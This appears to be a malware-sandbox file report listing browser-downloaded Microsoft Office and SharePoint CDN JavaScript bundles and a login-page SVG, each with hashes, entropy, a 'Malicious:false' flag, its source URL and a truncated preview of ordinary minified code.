                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6695:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7491:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2203)
                              Category:downloaded
                              Size (bytes):2232
                              Entropy (8bit):5.194006823911746
                              Encrypted:false
                              SSDEEP:
                              MD5:2A120BB28B75F438728ECD6CB6AD56C2
                              SHA1:53FDBCAFB9CCB01921EDB50D74F109151E8A8011
                              SHA-256:EB20D4EDFD20AB4F20BD44430433B0854CAAF7BCE729067A08741D988D7E5164
                              SHA-512:BB7EC6EA1C283F1ACA68BF5554EA6EA2A7716687A9A994F9953E9A297A38D8D1AF3F594059F9D780C484919242764425CE0270ADCFAE44996D49A454EE9CF358
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.customizable/fui.lcu-a8934ba4.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lcu"],{"fui.lcu_548":(e,t,n)=>{n.d(t,{bs:()=>s,uS:()=>c,LK:()=>d,Yn:()=>o});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.util_150");function o(e,t){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n]);return t}var s=i.createContext({customizations:{inCustomizerContext:!1,settings:{},scopedSettings:{}}});function c(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];if(e&&1===e.length&&e[0]&&!e[0].subComponentStyles)return e[0];for(var n={},i={},r=0,o=e;r<o.length;r++){var s=o[r];if(s)for(var d in s)if(s.hasOwnProperty(d)){if("subComponentStyles"===d&&void 0!==s.subComponentStyles){var l=s.subComponentStyles;for(var u in l)l.hasOwnProperty(u)&&(i.hasOwnProperty(u)?i[u].push(l[u]):i[u]=[l[u]]);continue}var f=n[d],p=s[d];n[d]=void 0===f?p:(0,a.AE)((0,a.AE)([],Array.isArray(f)?f:[f],!0),Array.isArray(p)?p:[p],!0)}}if(Object.keys(i).length>0){n.subComponentStyles={};var m=n.subComponentStyles,_=function(
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2797)
                              Category:downloaded
                              Size (bytes):2802
                              Entropy (8bit):5.1008409631573635
                              Encrypted:false
                              SSDEEP:
                              MD5:36E5B9689989618D1C8D3B5E2D18745C
                              SHA1:7D3CF23281D0701C116CBAEB30C504ECCB955B3F
                              SHA-256:C0FA0AFE5ADC12FB6D6DB281882F8C915C7C43B65E8691DB2A242C0504E9ECE7
                              SHA-512:5F9FA07FA12E3937B755B4AFB79720E774224A738C685819F6D9A8CF8B1164A1BC446CF94C2D3EA63242A0388921E069D4E31E2F9B1399E891957D5942FF0978
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1033.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1033],{5021:function(e,t,n){n.r(t),n.d(t,{commandDisplaySetSyncIssuesOverrideFuncsKey:function(){return b}});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(2108),o=n(7094),s=n(6300);function c(e,t){return(0,a.Zd)(this,void 0,void 0,function(){return(0,a.qr)(this,function(n){switch(n.label){case 0:return[4,Promise.all([(0,s.b)()])];case 1:return n.sent()[0].discardAndRemoveFromItemStore(e,t),[2]}})})}var d=new i.qT({name:"DiscardAllCommand",factory:{dependencies:{resources:i.lh,listDataStateStore:r.a},create:function(e){var t=e.resources,n=e.listDataStateStore;return{instance:{id:"discardAll",getCommand:function(){return{action:{id:"DiscardAllAction",isAvailable:!0,onExecute:function(){c(t,(0,a.AE)([],n.state.listRenderData.seedItems,!0))}},name:o.a,iconProps:{iconName:"Delete"},automationId:"discardAllCommand",isSupportedOffline:!0}}}}}}}),l=n(2264),u=new i.qT({name:"DiscardCommand",factory:{dependencies:{reso
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (18796)
                              Category:downloaded
                              Size (bytes):60442
                              Entropy (8bit):5.048837200683374
                              Encrypted:false
                              SSDEEP:
                              MD5:35BECE79BC37C6DC99AF7F73E4A1AA7F
                              SHA1:0DC774B7BDFCAE14AEDECD5531306A53C9B9EDD7
                              SHA-256:7D85A272AA26BD07CC4939FCF6AAB6E691CE8E3A5C9EF87536D3220F8C61FFFB
                              SHA-512:D935FE7070AD738BECAE984A41DF54FA17CC85000A97250CF1B460AFF2A54D1B652105E8A09778D2C6DE412D50C6AD45B180D31C027619B447A7C210A75A35CA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/en-us/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{658:function(e){e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,1552:function(e){e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,236:function(e){e.exports=JSON.parse('{"b":"Add shortcut to My files","d":"Add shortcut to OneDrive","n":"Remove","p":"Remove shortcut from My files","y":"Remove from shared list","a":"Add a shortcut to this folder in My files","o":"Remove the shortcut to this folder from My files","c":"Add a shortcut to this folder in OneDrive","m":"Remove the selected shortcut from this location","f":"Add shortcut to Albums","e":"Add a shortcut to this shared album in albums","k":"Open file location","t":"Date","s":"Any date","u":"Last 24 hours","w":"Last week","v":"Last month","x":"Last year","l":"Photos","r":"Type","g":"Any Type","i":"Folders","h":"Documents"
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (2240)
                              Category:downloaded
                              Size (bytes):14979
                              Entropy (8bit):5.934936510594641
                              Encrypted:false
                              SSDEEP:
                              MD5:233614F7204819E86CA4D3C5553F21B2
                              SHA1:D1FEC4AD2853A71B3489E79ADA7219FEFFE74471
                              SHA-256:3A30813758B344DFB3737C4DC26FD0BFE550C990A9EBC32EB3DC26BC5E10E2AB
                              SHA-512:FDC4ADA93630101773B3BD7F2B29A326B90CC4C71A862DBAAF5E4FAD31C06CB414BF4E4E790AEA6B11F63F41203CD8503F1850CDFC49D099C67A27BB41D8C3E7
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/ja/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{534:e=>{e.exports=JSON.parse('{"a":".........","c":"..............","b":"............................."}')}.,297:e=>{e.exports=JSON.parse('{"b":".................","a":"{0}.........."}')}.,536:e=>{e.exports=JSON.parse('{"a":".... ID : {0}","b":"................"}')}.,468:e=>{e.exports=JSON.parse('{"NONE":"..","SUM":"..","COUNT":".","AVG":"..","MAX":"...","MIN":"...","STDEV":"....","VAR":".."}')}.,466:e=>{e.exports=JSON.parse('{"b":"..","a":"..."}')}.,277:e=>{e.exports=JSON.parse('{"a":"..........","b":"..........","h":".........","g":"........","d":"{0} .........
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3240)
                              Category:downloaded
                              Size (bytes):7692
                              Entropy (8bit):5.255365165541821
                              Encrypted:false
                              SSDEEP:
                              MD5:03F990183CC25F8901DBF3EAB6ECCDAE
                              SHA1:983857D2294C575A96E8734FC584D58505AB57F6
                              SHA-256:9A485135B6F89B40395DD2D6FDCAFCF1A415BA2864C53F5257A2913E97B1B2B5
                              SHA-512:D57DF151EDEDA79737ADE7859A9170BF6002BC467A90D5B301B70D68B9AD8E561941101A154470BDE20CA96DC3085E1E0DFEEB6600F8A2DBB7BB6AF847B6062C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1439.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1439],{3145:function(e,t,n){n.r(t),n.d(t,{ShowPropertiesAction:function(){return y}});var a=n("tslib_102"),i=n(2095),r=n(2181),o=n(2237),s=n(2385),c=n(23),d=n(2100),l=n(2122),u=n(162),f=n(330),p=n(920),m=n(14),_=n(112),h=n(199),b=n(2416),g=n(939),v=n(69),y=function(e){function t(t,n){void 0===t&&(t={}),void 0===n&&(n={});var a=e.call(this,t,n)||this;a.name="ShowProperties";var i=n.isInfoPaneExpanded,c=void 0===i?a.resources.consume(r.resourceKey):i,m=n.isSharingSectionExpanded,_=void 0===m?a.resources.consume(u.v.optional):m,h=n.isInfoPaneAvailable,b=void 0===h?a.resources.consume(l.a.infoPane.isInfoPaneAvailable.optional):h,g=n.isFiltersPaneExpanded,v=void 0===g?a.resources.consume(o.a):g,y=n.isCopilotPaneExpanded,S=void 0===y?a.resources.consume(s.a):y,D=n.isColumnCustomizationPaneExpanded,I=void 0===D?a.resources.consume(l.a.columnCustomizationPane.isColumnCustomizationPaneExpanded.optional):D,x=n.rumOneHe
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (12973)
                              Category:downloaded
                              Size (bytes):19882
                              Entropy (8bit):5.33498958309786
                              Encrypted:false
                              SSDEEP:
                              MD5:BD644EE4E60F8B7ED39E9C890FB8EBA7
                              SHA1:D6F11679316F49C18A59334544205F08F7DB2DA3
                              SHA-256:D3372C52020D6D4E56E5897C3A8C5F97C8984E46C86EAEED7408F1383B279B39
                              SHA-512:15861EB600217A6D70B9E5544EE1D89FAF42D3E77ECE5E422B2EB0DDD2845A6F46D1B0736BEEA34911BA657BEB0C22665E3D0B3092BD8A721D6FBA0F8EE1A7ED
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/64.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[64],{1675:(e,t,n)=>{n.d(t,{a:()=>i,b:()=>a,c:()=>r});var a="addColumnCalloutCreateButton",i="addColumnCalloutCancelButton",r="columnTypesContainer"}.,1676:(e,t,n)=>{var a;n.d(t,{a:()=>i,b:()=>a}),function(e){e.PublishStartDate="1488b62f-b70f-4f75-a384-7a04fbada949"}(a||(a={}));var i="ReactClientFormSaveButton"}.,1677:(e,t,n)=>{n.d(t,{a:()=>i,b:()=>r,c:()=>a});var a="viewDialogViewTitle",i="viewDialogViewType",r="viewDialogPrimaryButton"}.,1148:(e,t,n)=>{n.d(t,{a:()=>_});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(86),o=n(33),s=n(57),c=new i.qT({name:"SPViewActionDataSource.key",loader:new i.g6(function(){return Promise.all([n.e("deferred.odsp-common"),n.e("deferred.odsp-datasources"),n.e("deferred"),n.e(256)]).then(n.bind(n,1503)).then(function(e){return e.spViewActionDataSourceKey})})}),d=n(5),l=n(24),u=n(104),f=n(53),p=n(85),m=function(){function e(e,t){this._navigation=t.navigation,this._listViewStore=t.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
                              Category:downloaded
                              Size (bytes):1173
                              Entropy (8bit):7.811199816788843
                              Encrypted:false
                              SSDEEP:
                              MD5:5C7ACF60A2ACAA5C54BF2B2EC6D484D8
                              SHA1:F1837FD5DB6DAD498148D7D77438DE693114B042
                              SHA-256:EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
                              SHA-512:11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
                              Malicious:false
                              Reputation:unknown
                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg
                              Preview:..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[.*.)..=.....z.?/.._......|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.*S..wM.,../.|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.*+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....*1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3925)
                              Category:downloaded
                              Size (bytes):7408
                              Entropy (8bit):5.332271065717667
                              Encrypted:false
                              SSDEEP:
                              MD5:8F12ED1CDB1F15D7E079A7D539D6068B
                              SHA1:B08BDBB79ABCD29BC8C2B79E9473AAB3DE9FDA0A
                              SHA-256:515802B48E1785C4F246BEAFC8DC81389CE195408405DFC73D3E8698B67A04AE
                              SHA-512:F97365D916B384FBBB9E2F5D9DAA764194BD5C186BE194965663FE0A213A5275260704ADFF48B3C8EB529F0049B5FC18D5487BEDA3A1017BD4FC2D168788649C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1025.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1025],{2417:function(e,t,n){n.d(t,{a:function(){return s}});var a,i=n("tslib_102"),r={height:"100%",display:"flex",flexDirection:"column"},o={width:"440px",minWidth:"none",maxWidth:"none"},s={Modal:{styles:{main:(0,i.W_)((0,i.W_)({selectors:(a={},a["@media (min-width: 480px)"]=(0,i.W_)({},o),a),minHeight:"240px"},o),{".fui-DialogBody":{minHeight:"190px"}})}},DialogContent:{styles:{content:r,inner:r,innerContent:r}},DialogFooter:{styles:{actions:{minHeight:"none"}}}}}.,3437:function(e,t,n){n.r(t),n.d(t,{ColorAndNameDialog:function(){return I}});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.lcoms_307"),o=n("fui.core_238"),s=n("fui.lco_35"),c=n(2486),d=n(6440),l=n("fui.util_150"),u=n(331),f=n(2417),p=n(86),m=n(3989),_=n(2927),h=n(1414),b=n("odsp.util_578").HW.isActivated("11855D25-5778-485A-BC5F-DC947892961D","12/11/2023","Fix focus issue where after exiting the dialog, the focus is not returned to the element
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (15314)
                              Category:downloaded
                              Size (bytes):79936
                              Entropy (8bit):5.3265990763642
                              Encrypted:false
                              SSDEEP:
                              MD5:FC838FE7A577C778B1D5F62BE9F045D1
                              SHA1:5443B0D2677DF8EE6C829EEA69442AFEB0F7E2EE
                              SHA-256:AD4CDF8531D8115C03F926C902FEA8050EA72C66EDF3750F7062D4D14AF09EA4
                              SHA-512:793C72FEFF18ECBB3778DA85560EA0A1528CAEF70139A606DDEF3E5DAA5A1F67396F5ABA445D3C35276F60F010FDD17C5E90DAEB3AF07FBF20356C8B22B859FA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/66.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[66,39,206],{1082:(e,t,n)=>{n.d(t,{a:()=>c});var a=n(503),i=n("odsp.util_578"),r=n(278),o=["AppendOnly","ClientSideComponentId","CommaSeparator","CustomFormatter","CustomUnitName","CustomUnitOnRight","DateFormat","Decimals","Description","DisplayName","EnforceUniqueValues","FieldRef","FillInChoice","FriendlyDisplayFormat","Format","Indexed","IsModern","IsolateStyles","IsRelationship","InternalName","LCID","List","Max","MaxLength","Min","Mult","Name","NumLines","Percentage","RelationshipDeleteBehavior","Required","RichText","RichTextMode","ShowField","StaticName","TimeFormat","Title","Type","Unit","UnlimitedLengthInDocumentLibrary","UserDisplayOptions","UserSelectionMode","UserSelectionScope"],s=["Choices","DefaultValue","DefaultFormula","FieldRefsXml","Validation"];const c=function(){function e(){var e=this;this._formatProperties={Field:{attributeKeys:o,childElementKeys:s,valueTransformer:function(t){return e.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3467)
                              Category:downloaded
                              Size (bytes):3472
                              Entropy (8bit):4.2818504787682885
                              Encrypted:false
                              SSDEEP:
                              MD5:050FC4D38D98FA520FEEF474362F4FB4
                              SHA1:48F6FF6B25144AAA39FD244D2218AF384EA76B89
                              SHA-256:AD9EC7AC11B18EE8045398734A7B3A1FDF96141B6218C75513FE6B6903CFD23C
                              SHA-512:485855BC2E20DC7823204DB7952249F73AB95BB92B5B0A87A70E7EFB17F1BB469000C836EDDE5AC32D21F8B0C9B641A8FC48EAD533BA3960ED21D3E9EBE77533
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/98775.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[98775],{898775:(e,t,n)=>{n.d(t,{CTZ:()=>r,EAw:()=>s,LEV:()=>o,iLd:()=>c,sIJ:()=>i});var a=n(875427);const i=(0,a.k)("Replay20Regular","20",["M3 6.5v-3a.5.5 0 0 1 1 0v1.2a7.98 7.98 0 0 1 7.94-2.46A8 8 0 1 1 2 9.48a.5.5 0 1 1 1 .07A6.97 6.97 0 0 0 3 10a7 7 0 1 0 1.25-4H6a.5.5 0 0 1 0 1H3.5a.5.5 0 0 1-.5-.5Zm4.5 1.47c0-.93.98-1.54 1.81-1.12l4.04 2.03c.92.47.92 1.77 0 2.24l-4.04 2.03a1.25 1.25 0 0 1-1.81-1.12V7.97Zm1.36-.23a.25.25 0 0 0-.36.23v4.06c0 .19.2.31.36.23l4.04-2.04a.25.25 0 0 0 0-.44L8.86 7.74Z"]),r=(0,a.k)("Settings20Regular","20",["M1.91 7.38A8.5 8.5 0 0 1 3.7 4.3a.5.5 0 0 1 .54-.13l1.92.68a1 1 0 0 0 1.32-.76l.36-2a.5.5 0 0 1 .4-.4 8.53 8.53 0 0 1 3.55 0c.2.04.35.2.38.4l.37 2a1 1 0 0 0 1.32.76l1.92-.68a.5.5 0 0 1 .54.13 8.5 8.5 0 0 1 1.78 3.08c.06.2 0 .4-.15.54l-1.56 1.32a1 1 0 0 0 0 1.52l1.56 1.32a.5.5 0 0 1 .15.54 8.5 8.5 0 0 1-1.78 3.08.5.5 0 0 1-.54.13l-1.92-.68a1 1 0 0 0-1.32.76
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3681)
                              Category:downloaded
                              Size (bytes):3686
                              Entropy (8bit):5.372122393172141
                              Encrypted:false
                              SSDEEP:
                              MD5:40DAC0A67540FF5824DD9C017E83782F
                              SHA1:F43331D7F7152696EFA59BBF7276EDF1C02F9235
                              SHA-256:5C65E120E44A6F9650D9372EA0B51890FFCED0CD3CA53E1D9DADEAF4B8B441CB
                              SHA-512:D59DD43ABC6F8BAD6EA77DB4B81436E7E844436FAF3A6E1ED0A742C86B0F47802A3447754D948BEA260034C2BAF61634585A15540F09E8124F2B886CD5892F05
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/99.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[99],{668:(e,t,n)=>{n.r(t),n.d(t,{SPListErrorControl:()=>E});var a=n("tslib_102"),i=n(534),r=n(535),o=n(536),s=n(538),c=n("odsp.util_578"),d=n(1),l=n(0),u=n(537),f=new c.qT("messenger"),p=n(395),m=n("fui.util_150"),_=n(32),h=n(92),b=n(57),g=n(34),v=n(154),y=new c.qT("viewRenderTrackerKey"),S=n(132),D=n(2),I=c.HW.isActivated("5de667b5-8e1c-40d5-b643-29e1bef4b1a8"),x=c.HW.isActivated("e0f1d592-4fd1-4b80-9502-087805218e7a");function C(e){return e?e.message&&"object"==typeof e.message?e.message.value:e.message:void 0}var O=(0,D.fc)()?(0,g.b)({loader:function(e){return e.PrimaryButton}}):(0,S.a)({loader:function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,Promise.all([n.e("fui.core"),n.e("fui.lco"),n.e("fui.lcoms"),n.e("fui.lcom"),n.e("fui.co"),n.e("ondemand.resx"),n.e(77)]).then(n.bind(n,636))];case 1:return[2,e.sent().PrimaryButton]}})})}}),w=(0
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:downloaded
                              Size (bytes):118887
                              Entropy (8bit):5.458992612793459
                              Encrypted:false
                              SSDEEP:
                              MD5:304B9C615A5FA80722D984AC95723469
                              SHA1:9F6B198CD99903A054639156AEB530207D530312
                              SHA-256:5410296BE595E676D6540E1C24E53EF81AFBA834A5B05B2F48B329617407D23D
                              SHA-512:F54F9E6923662954AC47348CBCE9831C0D0844F1014E9BCB0A25613A369E4FECBCF6CB23BF3EAB316E80EB721AC28D1414B1FECE15305768B25432233577FBFA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.components.migration.shims/fui.lcoms-9ae982b2.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lcoms"],{"fui.lcoms_307":(e,t,n)=>{n.d(t,{wXy:()=>vt,oyG:()=>Zr,TKW:()=>it,dN_:()=>_t,AP2:()=>$r,VgB:()=>xt,zJ_:()=>oo,DFf:()=>Nt,EaG:()=>so,giS:()=>rn,v93:()=>to,Sli:()=>an,Gc3:()=>Yt,gVJ:()=>co,nif:()=>eo,SHS:()=>on,oZI:()=>no,TA1:()=>bn,LUU:()=>lo,CQE:()=>yn,jvp:()=>ao,F4v:()=>Fn,kD6:()=>uo,SQN:()=>xn,_z:()=>Jr,EF3:()=>To,KeY:()=>un,GzT:()=>Kr,T_v:()=>Hn,C$c:()=>io,jVZ:()=>qn,lBm:()=>fo,ue1:()=>ta,A0O:()=>po,fGg:()=>da,gJ4:()=>mo,r71:()=>gn,DPH:()=>xa,aCz:()=>_o,kvx:()=>Aa,cjQ:()=>bo,A63:()=>Ua,wah:()=>ho,mqp:()=>dn,Udo:()=>Fa,FPE:()=>ro,V0w:()=>ja,Sg:()=>go,C9P:()=>ui,paX:()=>yo,Mlr:()=>_i,g$h:()=>vo,$B3:()=>Ga,GeI:()=>ei,Tmu:()=>oi,jWK:()=>Si,Fz1:()=>So,_4V:()=>Pi,nIc:()=>Do,ItA:()=>ji,vmV:()=>Io,ijH:()=>Zi,C2s:()=>Co,UJE:()=>ir,ukK:()=>xo,imH:()=>fr,ZtN:()=>Oo,bTi:()=>hr,O2f:()=>wo,jqT:()=>Or,Dlu:()=>Eo,N6W:()=>Gr,yjl:()=>Lo,$DD:()=>Vr,PkR:()=>Ao,dfg:()=>Xr,gRs:()=>Yr,szD:()=>me,uOU:()=>de,cVO:()=>
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5700)
                              Category:downloaded
                              Size (bytes):8616
                              Entropy (8bit):5.3568102569562654
                              Encrypted:false
                              SSDEEP:
                              MD5:5DC3CD885591EDD63D437C1030997A4C
                              SHA1:EACEE8C46914CE73DBBB69FB22E03F6ADA2634E1
                              SHA-256:02E00C01F235D6C3F0E11702E65C5DDDDF6FAD45E59CD751F54D6CD6C5371D60
                              SHA-512:0AEA63A44A49BA6ABC9116CE794CBB41A47FB8E3BE51C8EC857838A2B874D7C26A4F6B1D3E884110A22808A6BF75CDF531087220385BD00BCD2AF69F4C8AE9A4
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/80.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[80],{819:(e,t,n)=>{n.d(t,{a:()=>l});var a=n("react-dom-lib"),i=n("tslib_102"),r=n("react-lib"),o=n("fui.lcoms_307"),s=n(21),c=n("odsp.util_578");function d(){return!c.HW.isActivated("4BDEE9AA-40BA-4E0B-905B-33362718986A")&&(0,s.P)({ODB:61241})}var l,u=function(e){var t=e.children,n=r.useMemo(d,[]);return r.createElement(o._z.Provider,{value:n},t)};l=c.HW.isActivated("26DDB843-862A-4916-A636-1BCE47633238")?a.render:function(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];var n=e[0],a=e.slice(1);return o.bCK.apply(void 0,(0,i.AE)([r.createElement(u,null,n)],a,!1))}}.,626:(e,t,n)=>{n.r(t),n.d(t,{ReactBridge:()=>S,asPreact:()=>D});var a=n("react-lib"),i=n(1),r=n(0),o=n(121),s=n(157),c=n("tslib_102"),d=n("react-dom-lib"),l=n("fui.util_150"),u=n(557),f=0,p=(0,l.bQ)(function(e){return"".concat(++f)}),m=n(819),_=(0,i.c)({render:function(e,t){(0,m.a)(e,t)},unmount:d.unmountComponentAtNode}),h="AsReactChild
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1681)
                              Category:downloaded
                              Size (bytes):1686
                              Entropy (8bit):5.209853022819726
                              Encrypted:false
                              SSDEEP:
                              MD5:D31906564C45A0065A98016418E8B9A4
                              SHA1:04AAAD7DF41DBD1DA4D33A412A63C9D771C200AE
                              SHA-256:2ABEE2416C3CC6D2AA3AA35EAFDB7BE7A85B2ABC0C857CF3EA22589E12ADC1D3
                              SHA-512:63C720ADD3FB2B141B027BBCFB8CAFCF89E6D3F7D67EF7403845FA5D283A0E7EA5B8B516B3006025B16970A814262710B92CFD107394B31C0EBAA86645F288E3
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/49.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[49],{731:(e,t,n)=>{n.r(t),n.d(t,{onGridContentDragOverCallbackImpl:()=>l,onGridContentDropCallbackImpl:()=>u});var a=n("tslib_102"),i=n(52),r=n(3),o=n(29),s=n(20),c=n(83);function d(e){var t,n;if(e&&e.target){var a=e.target,i=(0,s.t)(a);t=(0,r.C)(i),n=(0,c.d)(a)}return{rowId:t,dropFieldName:n}}function l(e,t){return(0,a.Zd)(this,void 0,void 0,function(){var n,i,r;return(0,a.qr)(this,function(a){return t&&t.target&&e&&e.current&&(n=d(t),i=n.rowId,r=n.dropFieldName,i&&r&&e.current.selectSingleCell(i,r)),[2]})})}function u(e,t,n,s,c,l,u,f,p){return(0,a.Zd)(this,void 0,void 0,function(){var m,_,h,b,g,v,y;return(0,a.qr)(this,function(S){switch(S.label){case 0:return f&&f.target&&p&&p.length>0?(m=p[0],_=d(f),h=_.rowId,b=_.dropFieldName,h&&b?(g=e(h),(v=t.find(function(e){return e.field.realFieldName===b}))&&v.field&&v.field.type===i.a.Thumbnail&&n&&0===(null==m?void 0:m.type.indexOf("image"))?(function(e,t,n,i,s,c,d
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):165
                              Entropy (8bit):5.269857442915832
                              Encrypted:false
                              SSDEEP:
                              MD5:5087892560D4D344E524C1E424CBB210
                              SHA1:3F888DF06FC26EEB5738915CF519B93148E2A55F
                              SHA-256:FA5FB189F2D18E37FDBECB81874F289A1033496A2842300EF6B768AF68AB90A7
                              SHA-512:14A73FA2A5639163DF4B8EFE7C3EA10DEA71AE88B9D348913760BA2083470CD25A494BEA9AE668283C6DED94CACD58990CDEFD9C90FB5B463D47C8E072AD8E84
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/86.js
